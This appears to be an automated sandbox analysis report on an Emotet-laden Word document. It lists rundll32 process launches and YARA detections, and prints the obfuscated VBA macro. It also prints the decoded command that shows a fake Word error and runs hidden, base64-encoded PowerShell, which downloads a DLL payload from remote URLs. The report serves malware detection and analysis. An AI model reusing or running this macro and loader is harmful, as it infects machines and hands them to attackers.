Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2106781352.0000000000691000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2106704317.0000000000670000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 3056 Parent PID: 3032

General

Start time:	18:10:49
Start date:	08/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ghjb\hjdxzl.ejj',RunDLL
Imagebase:	0x950000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2108288197.00000000001C1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2108254547.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2244 Parent PID: 3056

General

Start time:	18:10:50
Start date:	08/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Doth\isebmn.lpx',RunDLL
Imagebase:	0x950000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2342697153.0000000000200000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: L6bihtdtnasc

Declaration

Line	Content
1	Attribute VB_Name = "L6bihtdtnasc"

Module: Qfepbztq9r8o1l76

Declaration

Line	Content
1	Attribute VB_Name = "Qfepbztq9r8o1l76"

Executed Functions

Function Enpewjzyrpx, APIs: 69, Strings: 40, Number of lines: 230, Relevance: 201.48

APIs	Meta Information
Item
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
ChrW
wdKeyS
Open
Open
Open
Open
Open
Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Open
Open
Open
CreateObject	CreateObject("winmgmtS:win32_process")
Open
Open
Open
Mid
Len	Len("\x01 J)(3s2)(J)(3s2)(cJ)(3s2)(mJ)(3s2)(dJ)(3s2)( J)(3s2)(cJ)(3s2)(mJ)(3s2)(dJ)(3s2)( J)(3s2)(cJ)(3s2)(mJ)(3s2)(dJ)(3s2)( J)(3s2)(cJ)(3s2)(mJ)(3s2)(dJ)(3s2)( J)(3s2)(/J)(3s2)(cJ)(3s2)( J)(3s2)(mJ)(3s2)(sJ)(3s2)(gJ)(3s2)( J)(3s2)(%J)(3s2)(uJ)(3s2)(sJ)(3s2)(eJ)(3s2)(rJ)(3s2)(nJ)(3s2)(aJ)(3s2)(mJ)(3s2)(eJ)(3s2)(%J)(3s2)( J)(3s2)(/J)(3s2)(vJ)(3s2)( J)(3s2)(WJ)(3s2)(oJ)(3s2)(rJ)(3s2)(dJ)(3s2)( J)(3s2)(eJ)(3s2)(xJ)(3s2)(pJ)(3s2)(eJ)(3s2)(rJ)(3s2)(iJ)(3s2)(eJ)(3s2)(nJ)(3s2)(cJ)(3s2)(eJ)(3s2)(dJ)(3s2)( J)(3s2)(aJ)(3s2)(nJ)(3s2)( J)(3s2)(eJ)(3s2)(rJ)(3s2)(rJ)(3s2)(oJ)(3s2)(rJ)(3s2)( J)(3s2)(tJ)(3s2)(rJ)(3s2)(yJ)(3s2)(iJ)(3s2)(nJ)(3s2)(gJ)(3s2)( J)(3s2)(tJ)(3s2)(oJ)(3s2)( J)(3s2)(oJ)(3s2)(pJ)(3s2)(eJ)(3s2)(nJ)(3s2)( J)(3s2)(tJ)(3s2)(hJ)(3s2)(eJ)(3s2)( J)(3s2)(fJ)(3s2)(iJ)(3s2)(lJ)(3s2)(eJ)(3s2)(.J)(3s2)( J)(3s2)(&J)(3s2)( J)(3s2)( J)(3s2)(PJ)(3s2)(OJ)(3s2)(wJ)(3s2)(eJ)(3s2)(rJ)(3s2)(sJ)(3s2)(hJ)(3s2)(eJ)(3s2)(LJ)(3s2)(LJ)(3s2)( J)(3s2)(-J)(3s2)(wJ)(3s2)( J)(3s2)(hJ)(3s2)(iJ)(3s2)(dJ)(3s2)(dJ)(3s2)(eJ)(3s2)(nJ)(3s2)( J)(3s2)(-J)(3s2)(EJ)(3s2)(NJ)(3s2)(CJ)(3s2)(OJ)(3s2)(DJ)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( IAJ)(3s2)(AkJ)(3s2)(AEJ)(3s2)(YAJ)(3s2)(MgJ)(3s2)(BPJ)(3s2)(AEJ)(3s2)(0AJ)(3s2)(WQJ)(3s2)(BqJ)(3s2)(ACJ)(3s2)(AAJ)(3s2)(IAJ)(3s2)(A9J)(3s2)(ACJ)(3s2)(AAJ)(3s2)(WwJ)(3s2)(B0J)(3s2)(AFJ)(3s2)(kAJ)(3s2)(UAJ)(3s2)(BlJ)(3s2)(AFJ)(3s2)(0AJ)(3s2)(KAJ)(3s2)(AiJ)(3s2)(AHJ)(3s2)(sAJ)(3s2)(MgJ)(3s2)(B9J)(3s2)(AHJ)(3s2)(sAJ)(3s2)(MAJ)(3s2)(B9J)(3s2)(AHJ)(3s2)(sAJ)(3s2)(MwJ)(3s2)(B9J)(3s2)(AHJ)(3s2)(sAJ)(3s2)(MQJ)(3s2)(B9J)(3s2)(ACJ)(3s2)(IAJ)(3s2)(IAJ)(3s2)(AtJ)(3s2)(AEJ)(3s2)(YAJ)(3s2)(IAJ)(3s2)(AnJ)(3s2)(AFJ)(3s2)(kAJ)(3s2)(UwJ)(3s2)(B0J)(3s2)(AGJ)(3s2)(UAJ)(3s2)(JwJ)(3s2)(AsJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(RAJ)(3s2)(BJJ)(3s2)(AHJ)(3s2)(IAJ)(3s2)(ZQJ)(3s2)(BjJ)(3s2)(AFJ)(3s2)(QAJ)(3s2)(bwJ)(3s2)(ByJ)(3s2)(AFJ)(3s2)(kAJ)(3s2)(JwJ)(3s2)(AsJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(cwJ)(3s2)(AnJ)(3s2)(ACJ)(3s2)(wAJ)(3s2)(JwJ)(3s2)(BNJ)(3s2)(ACJ)(3s2)(4AJ)(3s2)(SQJ)(3s2)(BPJ)(3s2)(ACJ)(3s2)(4AJ)(3s2)(JwJ)(3s2)(ApJ)(3s2)(ADJ)(3s2)(sAJ)(3s2)(IAJ)(3s2)(AgJ)(3s2)(ACJ)(3s2)(AAJ)(3s2)(JAJ)(3s2)(AwJ)(3s2)(AFJ)(3s2)(MAJ)(3s2)(SAJ)(3s2)(AxJ)(3s2)(AGJ)(3s2)(cAJ)(3s2)(MwJ)(3s2)(AgJ)(3s2)(ACJ)(3s2)(AAJ)(3s2)(PQJ)(3s2)(AgJ)(3s2)(AFJ)(3s2)(sAJ)(3s2)(VAJ)(3s2)(BZJ)(3s2)(AHJ)(3s2)(AAJ)(3s2)(RQJ)(3s2)(BdJ)(3s2)(ACJ)(3s2)(gAJ)(3s2)(IgJ)(3s2)(B7J)(3s2)(ADJ)(3s2)(MAJ)(3s2)(fQJ)(3s2)(B7J)(3s2)(ADJ)(3s2)(AAJ)(3s2)(fQJ)(3s2)(B7J)(3s2)(ADJ)(3s2)(IAJ)(3s2)(fQJ)(3s2)(B7J)(3s2)(ADJ)(3s2)(EAJ)(3s2)(fQJ)(3s2)(B7J)(3s2)(ADJ)(3s2)(QAJ)(3s2)(fQJ)(3s2)(AiJ)(3s2)(ACJ)(3s2)(0AJ)(3s2)(RgJ)(3s2)(AnJ)(3s2)(AEJ)(3s2)(UAJ)(3s2)(VAJ)(3s2)(AuJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(LAJ)(3s2)(AnJ)(3s2)(AGJ)(3s2)(MAJ)(3s2)(RQJ)(3s2)(BwJ)(3s2)(AEJ)(3s2)(8AJ)(3s2)(SQJ)(3s2)(BuJ)(3s2)(AFJ)(3s2)(QAJ)(3s2)(bQJ)(3s2)(AnJ)(3s2)(ACJ)(3s2)(wAJ)(3s2)(JwJ)(3s2)(BzJ)(3s2)(AGJ)(3s2)(UAJ)(3s2)(cgJ)(3s2)(BWJ)(3s2)(AGJ)(3s2)(kAJ)(3s2)(JwJ)(3s2)(AsJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(cwJ)(3s2)(B5J)(3s2)(AHJ)(3s2)(MAJ)(3s2)(dAJ)(3s2)(BlJ)(3s2)(AEJ)(3s2)(0AJ)(3s2)(LgJ)(3s2)(BuJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(LAJ)(3s2)(AnJ)(3s2)(AEJ)(3s2)(EAJ)(3s2)(TgJ)(3s2)(BhJ)(3s2)(AEJ)(3s2)(cAJ)(3s2)(ZQJ)(3s2)(BSJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(KQJ)(3s2)(AgJ)(3s2)(ACJ)(3s2)(AAJ)(3s2)(OwJ)(3s2)(AgJ)(3s2)(ACJ)(3s2)(AAJ)(3s2)(JAJ)(3s2)(BXJ)(3s2)(AHJ)(3s2)(UAJ)(3s2)(bAJ)(3s2)(B3J)(3s2)(AHJ)(3s2)(kAJ)(3s2)(dwJ)(3s2)(BkJ)(3s2)(ADJ)(3s2)(0AJ)(3s2)(KAJ)(3s2)(AoJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(VQJ)(3s2)(AnJ)(3s2)(ACJ)(3s2)(sAJ)(3s2)(JwJ)(3s2)(BmJ)(3s2)(AGJ)(3s2)(EAJ)(3s2)(JwJ)(3s2)(ApJ)(3s2)(ACJ)(3s2)(sAJ)(3s2)(KAJ)(3s2)(AnJ)(3s2)(AGJ)(3s2)(8AJ)(3s2)(cAJ)(3s2)(AnJ)(3s2)(ACJ)(3s2)(sAJ)(3s2)(JwJ)(3s2)(B2J)(3s2)(ACJ)(3s2)(cAJ)(3s2)(KQJ)(3s2)(ArJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(bQJ)(3s2)(AnJ)(3s2)(ACJ)(3s2)(kAJ)(3s2)(OwJ)(3s2)(AkJ)(3s2)(AEJ)(3s2)(MAJ)(3s2)(NgJ)(3s2)(A3J)(3s2)(AHJ)(3s2)(kAJ)(3s2)(dgJ)(3s2)(BwJ)(3s2)(AFJ)(3s2)(8AJ)(3s2)(PQJ)(3s2)(AkJ)(3s2)(AEJ)(3s2)(cAJ)(3s2)(ZwJ)(3s2)(BsJ)(3s2)(AGJ)(3s2)(gAJ)(3s2)(MgJ)(3s2)(BsJ)(3s2)(AGJ)(3s2)(kAJ)(3s2)(IAJ)(3s2)(ArJ)(3s2)(ACJ)(3s2) -> 39020
Open
Open
Open
Open
Open
Open
Create	SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAcgAnACkAKQArACgAKAAnAFIAJwArACcAdwBSAHoAJwArACcAYwBKACkAKAAzAHMAMgApACgAQAAnACsAJwBoAHQAJwArACcAdAAnACkAKQArACgAKAAnAHAAOgBKACcAKwAnACkAKAAnACkAKQArACcAMwBzACcAKwAnADIAJwArACgAKAAnACkAKABKACkAJwArACcAKAAnACkAKQArACgAJwAzAHMAJwArACcAMgAnACkAKwAoACgAJwApACgAagBvACcAKwAnAHMAZQBnACcAKwAnAGUAJwArACcAbgBlAC4AYwAnACkAKQArACgAJwBvACcAKwAnAG0ASgAnACkAKwAoACgAJwApACgAMwBzACcAKwAnADIAKQAoAHQAJwArACcAaAAnACkAKQArACcAZQBtACcAKwAoACgAJwBlAEoAKQAoADMAJwArACcAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoACcAKwAnAGcAVQA4AEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAQABoAHQAdAAnACkAKQArACgAKAAnAHAAJwArACcAOgBKACkAJwApACkAKwAnACgAJwArACgAKAAnADMAcwAnACsAJwAyACkAKABKACcAKwAnACkAKAAzAHMAJwApACkAKwAoACgAJwAyACkAKABwAGEAJwArACcAdQBsACcAKwAnAHMAJwApACkAKwAoACcAYwBvACcAKwAnAG0AcAAnACkAKwAoACcAdQB0AGkAJwArACcAbgAnACkAKwAoACcAZwAuAGMAJwArACcAbwAnACkAKwAoACgAJwBtACcAKwAnAEoAKQAoADMAcwAyACkAKAAnACkAKQArACgAJwBDACcAKwAnAHIAYQBpACcAKQArACgAJwBnACcAKwAnAHMATQAnACkAKwAnAGEAZwAnACsAKAAnAGkAYwBTAHEAJwArACcAdQBhAHIA,,) -> 0
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Part of subcall function Lala28ia3bsrs_njr8@Qfepbztq9r8o1l76: Open
Ud9_lppkb568bn7
Tt2eddizxwvf
Open
Open
Open
Open
Open
Open

Strings	Decrypted Strings
"GCWzCzxj.EBrCIIlA.lFKuCCPB"
"cHBGAIHG.cFpJGIJl.vbUoN"
"KlTTDXhW.iidsEDJqa.QyLHeCE"
"J)(3s2)(pJ)(3s2)("
"J)(3""s2)(roJ)(3s2"")(J)(3s2)(ceJ)(3s2"")(sJ)(3s2)(sJ)(3s""2)(J)(3s2)("
"YYaOCJyF.hdZxD.qyepAED"
"kpKDCAObU.IvFrXHGJP.NZDXABTE"
"MyIuIGxxD.VpYVAPIw.iMbgAEuc"
"J)(3s2)("":wJ)(3s2)(J)(3s""2)(inJ)(3s2)(3J)(""3s2)(2J)(3s2)(_J)(3s2)("
"PuLhbH.VgtBGDc.mMkjrBBF"
"FtLdBBFt.TgcFADq.QKdzF"
"SiPdpA.jcGoGFZG.ZFwWf"
"wJ)(3s2)(i""nJ)(3s2)(mJ)(3s2)(gmJ)(3""s2)(tJ)(3s2)(J)(3s2)("
"DdVxFIBEH.DhxsFC.oiBeEZBI"
"atyQEDH.RWyVArHAB.pVvDpHEuD"
"Cyabs.OCfwHDf.gOFzDG"
"vQgTUNiC.nBxYKHe.euwNI"
"SlGmA.VBVZECsNI.vtRtHG"
"xWUqJ.yvIzE.lOPJGBIID"
"lVppvD.wgJNDzCy.gLKXd"
"NwDyjJHj.sGvCc.zUWPZDN"
"fJnkNjH.nGdvFGC.zkPVeOFC"
"NrQDg.kdwxHDRVG.YuMDH"
"XLYdgIG.gQzexpZZ.RhwWu"
"noFGAFvHG.kPRnsl.iUayAGGJ"
"hbDlwlQJE.qsCgEh.gJUPEC"
"bsYyG.zoiSBCHJ.dLLbHJeCm"
"XxmzEU.DyPyOF.GnJMGdHHU"
"WdQWH.qAFZlDnI.EPZlJJDnD"
"ihoEED.PDrskFBA.bJbNF"
"ugVrJFm.YuthuIJ.ckCqK"
"zZudKI.oKzyJHE.mICJqCLW"
"gDQhOr.AdtYHAyCC.QdPVFH"
"IqlrqA.vtwEIm.lETEIJA"
"GBOjolD.psdHCIh.HuOuBFiwJ"
"wWbKMTCsB.TfYnablxs.EKZtUghe"
"wLTBZpoB.cMFiJ.phmHGHlJI"
"jyHqihfKA.HgOuAh.cuXjB"
"eRlbAHDf.VXIsV.yVVaFD"
"IhtjJG.WtfQBcbC.TNiPT"

Line	Instruction	Meta Information
42	Function Enpewjzyrpx()
43	On Error Resume Next	executed
44	mn2b = R4bm01nsbtdt1.StoryRanges.Item(1)	Item
45	Goto FfUdDPm
46	Dim SWDkIFtR as String
47	Open "GCWzCzxj.EBrCIIlA.lFKuCCPB" For Binary As 106	Open
48	Put # 106, , SWDkIFtR
49	Close # 106
49	FfUdDPm:
51	Goto pHvmE
52	Dim xLdgAFZA as String
53	Open "cHBGAIHG.cFpJGIJl.vbUoN" For Binary As 114	Open
54	Put # 114, , xLdgAFZA
55	Close # 114
55	pHvmE:
57	Goto XDsudqEDb
58	Dim yUhrXM as String
59	Open "KlTTDXhW.iidsEDJqa.QyLHeCE" For Binary As 166	Open
60	Put # 166, , yUhrXM
61	Close # 166
61	XDsudqEDb:
63	mwb2 = "J)(3s2)(pJ)(3s2)("
64	Slz7zz5j6il37ysy5 = "J)(3" + "s2)(roJ)(3s2" + ")(J)(3s2)(ceJ)(3s2" + ")(sJ)(3s2)(sJ)(3s" + "2)(J)(3s2)("
65	Goto ErRsBJD
66	Dim jLvyJe as String
67	Open "YYaOCJyF.hdZxD.qyepAED" For Binary As 164	Open
68	Put # 164, , jLvyJe
69	Close # 164
69	ErRsBJD:
71	Goto DVIODFG
72	Dim etMoIHJ as String
73	Open "kpKDCAObU.IvFrXHGJP.NZDXABTE" For Binary As 164	Open
74	Put # 164, , etMoIHJ
75	Close # 164
75	DVIODFG:
77	Goto LPluFEHD
78	Dim jSyHcJYnj as String
79	Open "MyIuIGxxD.VpYVAPIw.iMbgAEuc" For Binary As 69	Open
80	Put # 69, , jSyHcJYnj
81	Close # 69
81	LPluFEHD:
83	G4ji3ni5oag5hr0bs = "J)(3s2)(" + ":wJ)(3s2)(J)(3s" + "2)(inJ)(3s2)(3J)(" + "3s2)(2J)(3s2)(_J)(3s2)("
84	Goto mQgRQJCTI
85	Dim TAYfnygFI as String
86	Open "PuLhbH.VgtBGDc.mMkjrBBF" For Binary As 180	Open
87	Put # 180, , TAYfnygFI
88	Close # 180
88	mQgRQJCTI:
90	Goto CFoGN
91	Dim aiqHJw as String
92	Open "FtLdBBFt.TgcFADq.QKdzF" For Binary As 233	Open
93	Put # 233, , aiqHJw
94	Close # 233
94	CFoGN:
96	Goto jTeLG
97	Dim dSxaFFFR as String
98	Open "SiPdpA.jcGoGFZG.ZFwWf" For Binary As 187	Open
99	Put # 187, , dSxaFFFR
100	Close # 187
100	jTeLG:
102	Q1cm_khzbg8qv4fsm = "wJ)(3s2)(i" + "nJ)(3s2)(mJ)(3s2)(gmJ)(3" + "s2)(tJ)(3s2)(J)(3s2)("
103	Goto DhJcAB
104	Dim IQtEqBGHB as String
105	Open "DdVxFIBEH.DhxsFC.oiBeEZBI" For Binary As 139	Open
106	Put # 139, , IQtEqBGHB
107	Close # 139
107	DhJcAB:
109	Goto IdHEFHG
110	Dim zbWDKmIB as String
111	Open "atyQEDH.RWyVArHAB.pVvDpHEuD" For Binary As 70	Open
112	Put # 70, , zbWDKmIB
113	Close # 70
113	IdHEFHG:
115	Goto XgcnJVEG
116	Dim rPTbFNpIg as String
117	Open "Cyabs.OCfwHDf.gOFzDG" For Binary As 81	Open
118	Put # 81, , rPTbFNpIg
119	Close # 81
119	XgcnJVEG:
121	L13qv_7n6p_ = ChrW(wdKeyS)	ChrW wdKeyS
122	Goto RlXsHI
123	Dim dHHCYIX as String
124	Open "vQgTUNiC.nBxYKHe.euwNI" For Binary As 217	Open
125	Put # 217, , dHHCYIX
126	Close # 217
126	RlXsHI:
128	Goto Rwjxp
129	Dim HHrDJ as String
130	Open "SlGmA.VBVZECsNI.vtRtHG" For Binary As 105	Open
131	Put # 105, , HHrDJ
132	Close # 105
132	Rwjxp:
134	Goto uoFsgOnl
135	Dim yffJdpMFE as String
136	Open "xWUqJ.yvIzE.lOPJGBIID" For Binary As 108	Open
137	Put # 108, , yffJdpMFE
138	Close # 108
138	uoFsgOnl:
140	Q7oow2jcixygjgq4n = Q1cm_khzbg8qv4fsm + L13qv_7n6p_ + G4ji3ni5oag5hr0bs + mwb2 + Slz7zz5j6il37ysy5
141	Goto OdtXGe
142	Dim xaeBOIr as String
143	Open "lVppvD.wgJNDzCy.gLKXd" For Binary As 247	Open
144	Put # 247, , xaeBOIr
145	Close # 247
145	OdtXGe:
147	Goto uKlZBM
148	Dim wACNy as String
149	Open "NwDyjJHj.sGvCc.zUWPZDN" For Binary As 158	Open
150	Put # 158, , wACNy
151	Close # 158
151	uKlZBM:
153	Goto zwuglCFsC
154	Dim StHrFBBI as String
155	Open "fJnkNjH.nGdvFGC.zkPVeOFC" For Binary As 194	Open
156	Put # 194, , StHrFBBI
157	Close # 194
157	zwuglCFsC:
159	Eagl57d2fbt00xsd = Lala28ia3bsrs_njr8(Q7oow2jcixygjgq4n)
160	Goto aNLAA
161	Dim lvaOGgAa as String
162	Open "NrQDg.kdwxHDRVG.YuMDH" For Binary As 140	Open
163	Put # 140, , lvaOGgAa
164	Close # 140
164	aNLAA:
166	Goto qoqOYAnKJ
167	Dim pRVuBH as String
168	Open "XLYdgIG.gQzexpZZ.RhwWu" For Binary As 71	Open
169	Put # 71, , pRVuBH
170	Close # 71
170	qoqOYAnKJ:
172	Goto lICRFJ
173	Dim wMbuCy as String
174	Open "noFGAFvHG.kPRnsl.iUayAGGJ" For Binary As 153	Open
175	Put # 153, , wMbuCy
176	Close # 153
176	lICRFJ:
178	Set Che810bmyytv7es3 = CreateObject(Eagl57d2fbt00xsd)	CreateObject("winmgmtS:win32_process") executed
179	Goto BQvbJ
180	Dim uTaPAIGNH as String
181	Open "hbDlwlQJE.qsCgEh.gJUPEC" For Binary As 222	Open
182	Put # 222, , uTaPAIGNH
183	Close # 222
183	BQvbJ:
185	Goto Uzngzb
186	Dim FOjwlJ as String
187	Open "bsYyG.zoiSBCHJ.dLLbHJeCm" For Binary As 66	Open
188	Put # 66, , FOjwlJ
189	Close # 66
189	Uzngzb:
191	Goto XytRGbWWR
192	Dim TVKeFhHT as String
193	Open "XxmzEU.DyPyOF.GnJMGdHHU" For Binary As 135	Open
194	Put # 135, , TVKeFhHT
195	Close # 135
195	XytRGbWWR:
